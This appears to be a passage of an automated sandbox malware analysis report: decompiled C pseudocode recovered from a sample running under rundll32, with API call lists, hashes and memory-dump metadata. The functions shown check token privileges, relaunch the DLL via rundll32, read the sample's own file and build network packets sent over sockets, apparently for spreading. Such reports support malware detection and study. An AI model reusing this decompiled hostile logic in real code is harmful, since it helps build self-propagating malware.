                                                                                                          				_t39 = GlobalAlloc(0x40, _v8);
                                                                                                          				if(_t39 == 0) {
                                                                                                          					GetLastError();
                                                                                                          					L19:
                                                                                                          					goto L20;
                                                                                                          				}
                                                                                                          				if(GetTokenInformation(_v12, 2, _t39, _v8,  &_v8) == 0) {
                                                                                                          					GetLastError();
                                                                                                          					L17:
                                                                                                          					GlobalFree(_t39);
                                                                                                          					goto L19;
                                                                                                          				}
                                                                                                          				_t37 = 0;
                                                                                                          				if( *_t39 > 0) {
                                                                                                          					_t11 = _t39 + 4; // 0x4
                                                                                                          					_t43 = _t11;
                                                                                                          					while(_v16 == 0) {
                                                                                                          						_t31 = GetSidSubAuthorityCount( *_t43);
                                                                                                          						if(_t31 != 0 &&  *_t31 >= 4) {
                                                                                                          							_t32 = GetSidSubAuthority( *_t43, 4);
                                                                                                          							if(_t32 != 0) {
                                                                                                          								_t33 =  *_t32;
                                                                                                          								if(_t33 == 0x200 || _t33 == 0x207) {
                                                                                                          									_v16 = 1;
                                                                                                          								}
                                                                                                          							}
                                                                                                          						}
                                                                                                          						_t37 = _t37 + 1;
                                                                                                          						_t43 =  &(_t43[2]);
                                                                                                          						if(_t37 <  *_t39) {
                                                                                                          							continue;
                                                                                                          						} else {
                                                                                                          							goto L17;
                                                                                                          						}
                                                                                                          					}
                                                                                                          				}
                                                                                                          			}












                                                                                                          0x04a4893e
                                                                                                          0x04a48941
                                                                                                          0x04a48953
                                                                                                          0x04a48a17
                                                                                                          0x04a48a1d
                                                                                                          0x04a48a22
                                                                                                          0x04a48a22
                                                                                                          0x04a48964
                                                                                                          0x04a48971
                                                                                                          0x04a48a0c
                                                                                                          0x04a48a0f
                                                                                                          0x00000000
                                                                                                          0x04a48a0f
                                                                                                          0x04a48983
                                                                                                          0x04a48a0b
                                                                                                          0x00000000
                                                                                                          0x04a48a0b
                                                                                                          0x04a48995
                                                                                                          0x04a48999
                                                                                                          0x04a48a08
                                                                                                          0x04a48a0a
                                                                                                          0x00000000
                                                                                                          0x04a48a0a
                                                                                                          0x04a489ac
                                                                                                          0x04a489fd
                                                                                                          0x04a489ff
                                                                                                          0x04a48a00
                                                                                                          0x00000000
                                                                                                          0x04a48a00
                                                                                                          0x04a489ae
                                                                                                          0x04a489b2
                                                                                                          0x04a489b4
                                                                                                          0x04a489b4
                                                                                                          0x04a489b7
                                                                                                          0x04a489bf
                                                                                                          0x04a489c7
                                                                                                          0x04a489d2
                                                                                                          0x04a489da
                                                                                                          0x04a489dc
                                                                                                          0x04a489e3
                                                                                                          0x04a489ec
                                                                                                          0x04a489ec
                                                                                                          0x04a489e3
                                                                                                          0x04a489da
                                                                                                          0x04a489f3
                                                                                                          0x04a489f4
                                                                                                          0x04a489f9
                                                                                                          0x00000000
                                                                                                          0x04a489fb
                                                                                                          0x00000000
                                                                                                          0x04a489fb
                                                                                                          0x04a489f9
                                                                                                          0x04a489b7

                                                                                                          APIs
                                                                                                          • GetCurrentThread.KERNEL32 ref: 04A48944
                                                                                                          • OpenThreadToken.ADVAPI32(00000000), ref: 04A4894B
                                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 04A4896D
                                                                                                          • GetLastError.KERNEL32 ref: 04A4897E
                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 04A4898F
                                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 04A489A8
                                                                                                          • GetSidSubAuthorityCount.ADVAPI32(00000004), ref: 04A489BF
                                                                                                          • GetSidSubAuthority.ADVAPI32(00000004,00000004), ref: 04A489D2
                                                                                                          • GetLastError.KERNEL32 ref: 04A489FD
                                                                                                          • GlobalFree.KERNEL32 ref: 04A48A00
                                                                                                          • GetLastError.KERNEL32 ref: 04A48A08
                                                                                                          • CloseHandle.KERNEL32(?), ref: 04A48A0F
                                                                                                          • GetLastError.KERNEL32 ref: 04A48A17
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$Token$AuthorityGlobalInformationThread$AllocCloseCountCurrentFreeHandleOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1283781744-0
                                                                                                          • Opcode ID: 51519f093ee3b3e937b782a2f381c0b81f50d06ac5c5c2c3f24e55b0c392b2aa
                                                                                                          • Instruction ID: ed71d0b23ece13b31f1ff82e68b9238249679a033f9cb9e0351f8dec57e03361
                                                                                                          • Opcode Fuzzy Hash: 51519f093ee3b3e937b782a2f381c0b81f50d06ac5c5c2c3f24e55b0c392b2aa
                                                                                                          • Instruction Fuzzy Hash: 7F318F39900205EFEB10AFA5EC88B9D7F78EFC0740F104168EA01A3081C77EAE42DB65
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 92%
                                                                                                          			E04A440E3(intOrPtr* __ebx, void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed short _a24) {
                                                                                                          				char _v5;
                                                                                                          				void* _v12;
                                                                                                          				void* _t43;
                                                                                                          				signed int _t50;
                                                                                                          				intOrPtr* _t54;
                                                                                                          				void* _t63;
                                                                                                          
                                                                                                          				_t54 = __ebx;
                                                                                                          				_push(__ecx);
                                                                                                          				_push(__ecx);
                                                                                                          				_v5 = 0;
                                                                                                          				_t63 = HeapAlloc(GetProcessHeap(), 8, 0x27);
                                                                                                          				if(_t63 != 0) {
                                                                                                          					 *_t63 = 0x12;
                                                                                                          					 *((intOrPtr*)(_t63 + 0x1c)) = 0x48;
                                                                                                          					if(1 !=  *__ebx) {
                                                                                                          						 *(_t63 + 8) = 8;
                                                                                                          					} else {
                                                                                                          						 *(_t63 + 8) = 4;
                                                                                                          					}
                                                                                                          					 *(_t63 + 0x18) =  *(_t63 + 8);
                                                                                                          					 *(_t63 + 0x20) =  *(_t54 + 0x54) & 0x000000ff;
                                                                                                          					 *(_t63 + 0x25) =  *(_t63 + 0x18) + 1;
                                                                                                          					_t43 = HeapAlloc(GetProcessHeap(), 8, 9);
                                                                                                          					_v12 = _t43;
                                                                                                          					if(_t43 != 0) {
                                                                                                          						 *((intOrPtr*)(_t43 + 1)) = _a12;
                                                                                                          						 *((intOrPtr*)(_t43 + 5)) = _a16;
                                                                                                          						_t58 =  *(_t63 + 0x25) & 0x0000ffff;
                                                                                                          						if(E04A43209( *(_t63 + 0x25) & 0x0000ffff, _a4, _a8,  *(_t54 + 0x30) & 0x0000ffff, _t63, _t43,  *(_t63 + 0x25) & 0x0000ffff) != 0) {
                                                                                                          							Sleep(0x7d0);
                                                                                                          							_t50 = _a24 & 0x0000ffff;
                                                                                                          							 *(_t63 + 0x20) =  *(_t63 + 0x20) & 0x00000000;
                                                                                                          							 *(_t63 + 8) = _t50;
                                                                                                          							 *(_t63 + 0x18) = _t50;
                                                                                                          							_t51 = _t50 + 1;
                                                                                                          							 *(_t63 + 0x25) = _t50 + 1;
                                                                                                          							if(E04A43209(_t58, _a4, _a8,  *(_t54 + 0x32) & 0x0000ffff, _t63, _a20, _t51) != 0) {
                                                                                                          								Sleep(0x7d0);
                                                                                                          								_v5 = 1;
                                                                                                          							}
                                                                                                          						}
                                                                                                          						HeapFree(GetProcessHeap(), 8, _v12);
                                                                                                          					}
                                                                                                          					HeapFree(GetProcessHeap(), 8, _t63);
                                                                                                          				}
                                                                                                          				return _v5;
                                                                                                          			}









                                                                                                          0x04a440e3
                                                                                                          0x04a440e6
                                                                                                          0x04a440e7
                                                                                                          0x04a440f4
                                                                                                          0x04a44101
                                                                                                          0x04a44105
                                                                                                          0x04a4410e
                                                                                                          0x04a44111
                                                                                                          0x04a4411b
                                                                                                          0x04a44126
                                                                                                          0x04a4411d
                                                                                                          0x04a4411d
                                                                                                          0x04a4411d
                                                                                                          0x04a44130
                                                                                                          0x04a44137
                                                                                                          0x04a44144
                                                                                                          0x04a4414b
                                                                                                          0x04a44151
                                                                                                          0x04a44156
                                                                                                          0x04a4415b
                                                                                                          0x04a44161
                                                                                                          0x04a44164
                                                                                                          0x04a4417d
                                                                                                          0x04a44184
                                                                                                          0x04a4418a
                                                                                                          0x04a4418e
                                                                                                          0x04a44192
                                                                                                          0x04a44195
                                                                                                          0x04a44198
                                                                                                          0x04a4419a
                                                                                                          0x04a441b5
                                                                                                          0x04a441bc
                                                                                                          0x04a441c2
                                                                                                          0x04a441c2
                                                                                                          0x04a441b5
                                                                                                          0x04a441ce
                                                                                                          0x04a441ce
                                                                                                          0x04a441da
                                                                                                          0x04a441da
                                                                                                          0x04a441e6

                                                                                                          APIs
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000027,?,00000000,?,?,?,04A4423D,?,?,?,?,00000000,00000002), ref: 04A440F8
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,04A4423D,?,?,?,?,00000000,00000002), ref: 04A440FB
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000009,?,?,?,04A4423D,?,?,?,?,00000000,00000002), ref: 04A44148
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,04A4423D,?,?,?,?,00000000,00000002), ref: 04A4414B
                                                                                                          • Sleep.KERNEL32(000007D0,00000000,?,?,00000000,00000000,?,?,?,?,04A4423D,?,?,?,?,00000000), ref: 04A44184
                                                                                                          • Sleep.KERNEL32(000007D0,00000000,?,?,00000000,?,04A4423E,?,?,?,04A4423D,?,?,?,?,00000000), ref: 04A441BC
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,00000000,00000000,?,?,?,?,04A4423D,?,?,?,?), ref: 04A441CB
                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,04A4423D,?,?,?,?,00000000,00000002), ref: 04A441CE
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04A4423D,?,?,?,?,00000000,00000002), ref: 04A441D7
                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,04A4423D,?,?,?,?,00000000,00000002), ref: 04A441DA
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Process$AllocFreeSleep
                                                                                                          • String ID: Uqt0Xqt
                                                                                                          • API String ID: 1437939644-3529349503
                                                                                                          • Opcode ID: edcaa1ee9d4bcf743c5dcd503ec897213180b48d5a240f7a771a2941581abdc0
                                                                                                          • Instruction ID: c33659088de88fcf685bc70735dee4f5ceaed88b614fc51addd8f064fcfff2ac
                                                                                                          • Opcode Fuzzy Hash: edcaa1ee9d4bcf743c5dcd503ec897213180b48d5a240f7a771a2941581abdc0
                                                                                                          • Instruction Fuzzy Hash: 63318EB4500355AADB209F65C808B6F7FF8FFD9300F008509FD899A690D779E845DB60
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E04A47BF7(intOrPtr _a12) {
                                                                                                          				struct _PROCESS_INFORMATION _v20;
                                                                                                          				struct _STARTUPINFOW _v88;
                                                                                                          				short _v1648;
                                                                                                          				short _v3208;
                                                                                                          				int _t14;
                                                                                                          				char* _t20;
                                                                                                          				char* _t21;
                                                                                                          				void* _t27;
                                                                                                          				long _t28;
                                                                                                          				long _t29;
                                                                                                          
                                                                                                          				_t14 = GetSystemDirectoryW( &_v1648, 0x30c);
                                                                                                          				if(_t14 != 0) {
                                                                                                          					_t14 = lstrcatW( &_v1648, L"\\rundll32.exe");
                                                                                                          					if(_t14 != 0) {
                                                                                                          						_t14 = GetModuleFileNameW( *0x4a57b98, 0x4a57bc8, 0x30c);
                                                                                                          						if(_t14 != 0) {
                                                                                                          							wsprintfW( &_v3208, L"%ws C:\\Windows\\%ws,#1 %ws",  &_v1648, PathFindFileNameW(0x4a57bc8), _a12);
                                                                                                          							_t27 = 0x10;
                                                                                                          							_t20 =  &_v20;
                                                                                                          							do {
                                                                                                          								 *_t20 = 0;
                                                                                                          								_t20 = _t20 + 1;
                                                                                                          								_t27 = _t27 - 1;
                                                                                                          							} while (_t27 != 0);
                                                                                                          							_t29 = 0x44;
                                                                                                          							_t28 = _t29;
                                                                                                          							_t21 =  &_v88;
                                                                                                          							do {
                                                                                                          								 *_t21 = 0;
                                                                                                          								_t21 = _t21 + 1;
                                                                                                          								_t28 = _t28 - 1;
                                                                                                          							} while (_t28 != 0);
                                                                                                          							_v88.cb = _t29;
                                                                                                          							_t14 = CreateProcessW( &_v1648,  &_v3208, 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20);
                                                                                                          							ExitProcess(0);
                                                                                                          						}
                                                                                                          					}
                                                                                                          				}
                                                                                                          				return _t14;
                                                                                                          			}













                                                                                                          0x04a47c0e
                                                                                                          0x04a47c16
                                                                                                          0x04a47c28
                                                                                                          0x04a47c30
                                                                                                          0x04a47c43
                                                                                                          0x04a47c4b
                                                                                                          0x04a47c6b
                                                                                                          0x04a47c76
                                                                                                          0x04a47c77
                                                                                                          0x04a47c7c
                                                                                                          0x04a47c7c
                                                                                                          0x04a47c7e
                                                                                                          0x04a47c7f
                                                                                                          0x04a47c7f
                                                                                                          0x04a47c84
                                                                                                          0x04a47c85
                                                                                                          0x04a47c87
                                                                                                          0x04a47c8a
                                                                                                          0x04a47c8a
                                                                                                          0x04a47c8c
                                                                                                          0x04a47c8d
                                                                                                          0x04a47c8d
                                                                                                          0x04a47cb0
                                                                                                          0x04a47cb3
                                                                                                          0x04a47cba
                                                                                                          0x04a47cba
                                                                                                          0x04a47c4b
                                                                                                          0x04a47c30
                                                                                                          0x04a47cc2

                                                                                                          APIs
                                                                                                          • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 04A47C0E
                                                                                                          • lstrcatW.KERNEL32(?,\rundll32.exe), ref: 04A47C28
                                                                                                          • GetModuleFileNameW.KERNEL32(04A57BC8,0000030C), ref: 04A47C43
                                                                                                          • PathFindFileNameW.SHLWAPI(04A57BC8,?), ref: 04A47C51
                                                                                                          • wsprintfW.USER32 ref: 04A47C6B
                                                                                                          • CreateProcessW.KERNEL32 ref: 04A47CB3
                                                                                                          • ExitProcess.KERNEL32 ref: 04A47CBA
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileNameProcess$CreateDirectoryExitFindModulePathSystemlstrcatwsprintf
                                                                                                          • String ID: %ws C:\Windows\%ws,#1 %ws$\rundll32.exe
                                                                                                          • API String ID: 3592876439-3730106045
                                                                                                          • Opcode ID: 7318f68e71d836d28953e41f8a6f482f288e982001aa076673c1d0107f766e98
                                                                                                          • Instruction ID: 1f99c07c75d4508088f23242eadcd7aed28b6d0bc058400791d8bdfbd5de4027
                                                                                                          • Opcode Fuzzy Hash: 7318f68e71d836d28953e41f8a6f482f288e982001aa076673c1d0107f766e98
                                                                                                          • Instruction Fuzzy Hash: 3211B1B6901219AFEB119BA4CE48EEF37BCEFD8200F044162F906E6041DB35AE458B64
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E04A48832() {
                                                                                                          				long _v8;
                                                                                                          				void* _v12;
                                                                                                          				long _v16;
                                                                                                          				void* _t10;
                                                                                                          				void* _t21;
                                                                                                          				long _t25;
                                                                                                          
                                                                                                          				_v16 = 0;
                                                                                                          				_t10 = CreateFileW(0x4a57bc8, 0x80000000, 1, 0, 3, 0, 0);
                                                                                                          				_v12 = _t10;
                                                                                                          				if(_t10 != 0xffffffff) {
                                                                                                          					_t25 = GetFileSize(_t10, 0);
                                                                                                          					if(_t25 != 0) {
                                                                                                          						_t21 = HeapAlloc(GetProcessHeap(), 0, _t25);
                                                                                                          						if(_t21 != 0) {
                                                                                                          							_v8 = 0;
                                                                                                          							if(ReadFile(_v12, _t21, _t25,  &_v8, 0) != 0 || _v8 != _t25) {
                                                                                                          								 *0x4a53984 = _t21;
                                                                                                          								 *0x4a57b94 = _t25;
                                                                                                          								_v16 = 1;
                                                                                                          							} else {
                                                                                                          								HeapFree(GetProcessHeap(), 0, _t21);
                                                                                                          							}
                                                                                                          						}
                                                                                                          					}
                                                                                                          					CloseHandle(_v12);
                                                                                                          				}
                                                                                                          				return _v16;
                                                                                                          			}









                                                                                                          0x04a4884c
                                                                                                          0x04a4884f
                                                                                                          0x04a48855
                                                                                                          0x04a4885b
                                                                                                          0x04a48866
                                                                                                          0x04a4886a
                                                                                                          0x04a4887c
                                                                                                          0x04a48880
                                                                                                          0x04a4888c
                                                                                                          0x04a48897
                                                                                                          0x04a488af
                                                                                                          0x04a488b5
                                                                                                          0x04a488bb
                                                                                                          0x04a4889e
                                                                                                          0x04a488a7
                                                                                                          0x04a488a7
                                                                                                          0x04a48897
                                                                                                          0x04a488c2
                                                                                                          0x04a488c6
                                                                                                          0x04a488cc
                                                                                                          0x04a488d2

                                                                                                          APIs
                                                                                                          • CreateFileW.KERNEL32(04A57BC8,80000000,00000001,00000000,00000003,00000000,00000000), ref: 04A4884F
                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 04A48860
                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04A4886F
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 04A48876
                                                                                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 04A4888F
                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04A488A0
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A488A7
                                                                                                          • CloseHandle.KERNEL32(?), ref: 04A488C6
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$File$Process$AllocCloseCreateFreeHandleReadSize
                                                                                                          • String ID: Oqt Uqt0Xqt
                                                                                                          • API String ID: 3250796435-636472023
                                                                                                          • Opcode ID: 525a0515e9dd21724203e69587ae9537dc69b74f7f434d1b8159c0dd4aedec03
                                                                                                          • Instruction ID: 45b693b123c8f04156d3c7a968552643b439d61decc0c23b70f9ac5c2511cb5e
                                                                                                          • Opcode Fuzzy Hash: 525a0515e9dd21724203e69587ae9537dc69b74f7f434d1b8159c0dd4aedec03
                                                                                                          • Instruction Fuzzy Hash: 03118C79900204FBEB206FA5AD8CDAFBFBCEBD97A0F000119F801A2140D3799D02DB20
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 37%
                                                                                                          			E04A433A4(void* __ecx, intOrPtr _a4, void* _a8, short _a12, void* _a16, void* _a20, signed int _a24) {
                                                                                                          				char _v5;
                                                                                                          				long _v12;
                                                                                                          				long _t21;
                                                                                                          				void* _t27;
                                                                                                          				void* _t31;
                                                                                                          				void* _t35;
                                                                                                          				signed int _t38;
                                                                                                          				void* _t40;
                                                                                                          				void* _t46;
                                                                                                          
                                                                                                          				_t21 = (_a24 & 0x0000ffff) + 0x37;
                                                                                                          				_v5 = 0;
                                                                                                          				_v12 = _t21;
                                                                                                          				_t35 = HeapAlloc(GetProcessHeap(), 8, _t21);
                                                                                                          				if(_t35 != 0) {
                                                                                                          					_t38 = 9;
                                                                                                          					_t27 = memcpy(_t35, _a8, _t38 << 2);
                                                                                                          					__imp__#9(_v12 + 0xfffffffc, _t40, _t46);
                                                                                                          					 *(_t35 + 2) = _t27;
                                                                                                          					 *((short*)(_t35 + 0x22)) = _a12;
                                                                                                          					 *((char*)(_t35 + 8)) = 0x26;
                                                                                                          					asm("movsd");
                                                                                                          					asm("movsd");
                                                                                                          					asm("movsd");
                                                                                                          					asm("movsd");
                                                                                                          					asm("movsw");
                                                                                                          					_t15 = _t35 + 0x37; // 0x37
                                                                                                          					asm("movsb");
                                                                                                          					_t31 = memcpy(_t15, _a20, _a24 & 0x0000ffff);
                                                                                                          					__imp__#19(_a4, _t35, _v12, 0);
                                                                                                          					if(_t31 > 0) {
                                                                                                          						_v5 = 1;
                                                                                                          					}
                                                                                                          					HeapFree(GetProcessHeap(), 8, _t35);
                                                                                                          				}
                                                                                                          				return _v5;
                                                                                                          			}












                                                                                                          0x04a433ae
                                                                                                          0x04a433b4
                                                                                                          0x04a433b8
                                                                                                          0x04a433c8
                                                                                                          0x04a433cc
                                                                                                          0x04a433d8
                                                                                                          0x04a433df
                                                                                                          0x04a433e1
                                                                                                          0x04a433ea
                                                                                                          0x04a433f2
                                                                                                          0x04a433fa
                                                                                                          0x04a43401
                                                                                                          0x04a43402
                                                                                                          0x04a43403
                                                                                                          0x04a43404
                                                                                                          0x04a43409
                                                                                                          0x04a4340b
                                                                                                          0x04a4340f
                                                                                                          0x04a43410
                                                                                                          0x04a43421
                                                                                                          0x04a4342b
                                                                                                          0x04a4342d
                                                                                                          0x04a4342d
                                                                                                          0x04a4343b
                                                                                                          0x04a4343b
                                                                                                          0x04a43446

                                                                                                          APIs
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,04A43745,?,?,?,00000000,00000000,?,?,?,04A44A6E), ref: 04A433BB
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,04A43745,?,?,?,00000000,00000000,?,?,?,04A44A6E,?,?,?,?), ref: 04A433C2
                                                                                                          • htons.WS2_32(?), ref: 04A433E1
                                                                                                          • memcpy.MSVCRT ref: 04A43410
                                                                                                          • send.WS2_32(?,00000000,?,00000000), ref: 04A43421
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04A43434
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A4343B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Process$AllocFreehtonsmemcpysend
                                                                                                          • String ID: Oqt Uqt0Xqt
                                                                                                          • API String ID: 4260819906-636472023
                                                                                                          • Opcode ID: 8200a68901b16bbc83d76f99b2b69f08e194cbbe5b4de03ff72b562a195720ad
                                                                                                          • Instruction ID: e0f3af978a253293c80850b3d24ce878f338beb186e694961700db5916733b52
                                                                                                          • Opcode Fuzzy Hash: 8200a68901b16bbc83d76f99b2b69f08e194cbbe5b4de03ff72b562a195720ad
                                                                                                          • Instruction Fuzzy Hash: A0115BBA500249BBEB019FA4D889BEF7BA8EF99315F048055FD009A241D7BAD906C771
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 60%
                                                                                                          			E04A43209(void* __ecx, intOrPtr _a4, void* _a8, short _a12, void* _a16, void* _a20, signed short _a24) {
                                                                                                          				char _v5;
                                                                                                          				long _v12;
                                                                                                          				long _t22;
                                                                                                          				void* _t28;
                                                                                                          				int _t31;
                                                                                                          				void* _t33;
                                                                                                          				void* _t37;
                                                                                                          				signed int _t40;
                                                                                                          				void* _t44;
                                                                                                          				void* _t52;
                                                                                                          
                                                                                                          				_t22 = (_a24 & 0x0000ffff) + 0x4b;
                                                                                                          				_v5 = 0;
                                                                                                          				_v12 = _t22;
                                                                                                          				_t37 = HeapAlloc(GetProcessHeap(), 8, _t22);
                                                                                                          				if(_t37 != 0) {
                                                                                                          					_t40 = 9;
                                                                                                          					_t28 = memcpy(_t37, _a8, _t40 << 2);
                                                                                                          					__imp__#9(_v12 + 0xfffffffc, _t44, _t52);
                                                                                                          					 *(_t37 + 2) = _t28;
                                                                                                          					 *((short*)(_t37 + 0x22)) = _a12;
                                                                                                          					 *((char*)(_t37 + 8)) = 0xa1;
                                                                                                          					_t13 = _t37 + 0x24; // 0x24
                                                                                                          					_t31 = memcpy(_t13, _a16, 0 << 2);
                                                                                                          					asm("movsw");
                                                                                                          					_t16 = _t37 + 0x4b; // 0x4b
                                                                                                          					asm("movsb");
                                                                                                          					_t33 = memcpy(_t16, _a20, _t31);
                                                                                                          					__imp__#19(_a4, _t37, _v12, 0, 9);
                                                                                                          					if(_t33 > 0) {
                                                                                                          						_v5 = 1;
                                                                                                          					}
                                                                                                          					HeapFree(GetProcessHeap(), 8, _t37);
                                                                                                          				}
                                                                                                          				return _v5;
                                                                                                          			}













                                                                                                          0x04a43213
                                                                                                          0x04a43219
                                                                                                          0x04a4321d
                                                                                                          0x04a4322d
                                                                                                          0x04a43231
                                                                                                          0x04a4323d
                                                                                                          0x04a43244
                                                                                                          0x04a43246
                                                                                                          0x04a4324f
                                                                                                          0x04a43259
                                                                                                          0x04a43262
                                                                                                          0x04a43266
                                                                                                          0x04a43269
                                                                                                          0x04a4326f
                                                                                                          0x04a43271
                                                                                                          0x04a43275
                                                                                                          0x04a43276
                                                                                                          0x04a43287
                                                                                                          0x04a43291
                                                                                                          0x04a43293
                                                                                                          0x04a43293
                                                                                                          0x04a432a1
                                                                                                          0x04a432a1
                                                                                                          0x04a432ac

                                                                                                          APIs
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,04A43BAA,?,?,?,00000000,00000000,?,?,?,04A44A6E), ref: 04A43220
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,04A43BAA,?,?,?,00000000,00000000,?,?,?,04A44A6E,?,?,?,?), ref: 04A43227
                                                                                                          • htons.WS2_32(?), ref: 04A43246
                                                                                                          • memcpy.MSVCRT ref: 04A43276
                                                                                                          • send.WS2_32(?,00000000,?,00000000), ref: 04A43287
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04A4329A
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A432A1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
